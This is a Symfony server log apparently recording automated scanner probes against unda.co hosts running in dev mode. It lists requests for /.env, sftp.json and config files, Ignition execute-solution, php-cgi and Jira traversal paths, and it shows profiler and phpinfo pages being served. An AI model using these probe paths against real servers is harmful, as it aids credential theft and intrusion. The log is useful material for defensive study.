[2025-12-19 09:44:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-19 09:44:49] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 09:44:49] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:44:49] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:44:49] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:44:49] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:44:49] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:44:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:44:58] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-19 09:48:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=twig","method":"GET"} []
[2025-12-19 09:48:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-19 09:48:56] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://api.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 09:48:56] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 09:48:56] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:48:56] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:48:56] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:48:56] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:48:56] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:53:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=security","method":"GET"} []
[2025-12-19 09:53:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-19 09:53:51] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-19 09:54:36] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 09:56:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=time","method":"GET"} []
[2025-12-19 09:56:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-19 09:57:17] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"HEAD"} []
[2025-12-19 09:57:17] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 09:57:17] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 09:57:17] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 09:57:17] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:57:17] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:57:17] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:57:18] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"HEAD"} []
[2025-12-19 09:57:19] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-19 09:57:19] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 09:57:19] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 09:57:19] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 09:57:19] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:57:19] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:57:19] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:57:19] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-19 09:57:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:57:21] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-19 09:57:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 09:57:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 09:57:21] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 09:57:21] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:57:21] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:57:21] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:57:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-19 09:57:23] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"POST"} []
[2025-12-19 09:57:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:57:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:57:43] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:58:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4e9618","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/4e9618?panel=cache","method":"GET"} []
[2025-12-19 09:58:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-19 10:05:06] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-19 10:05:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7750d3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7750d3?panel=security","method":"GET"} []
[2025-12-19 10:05:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
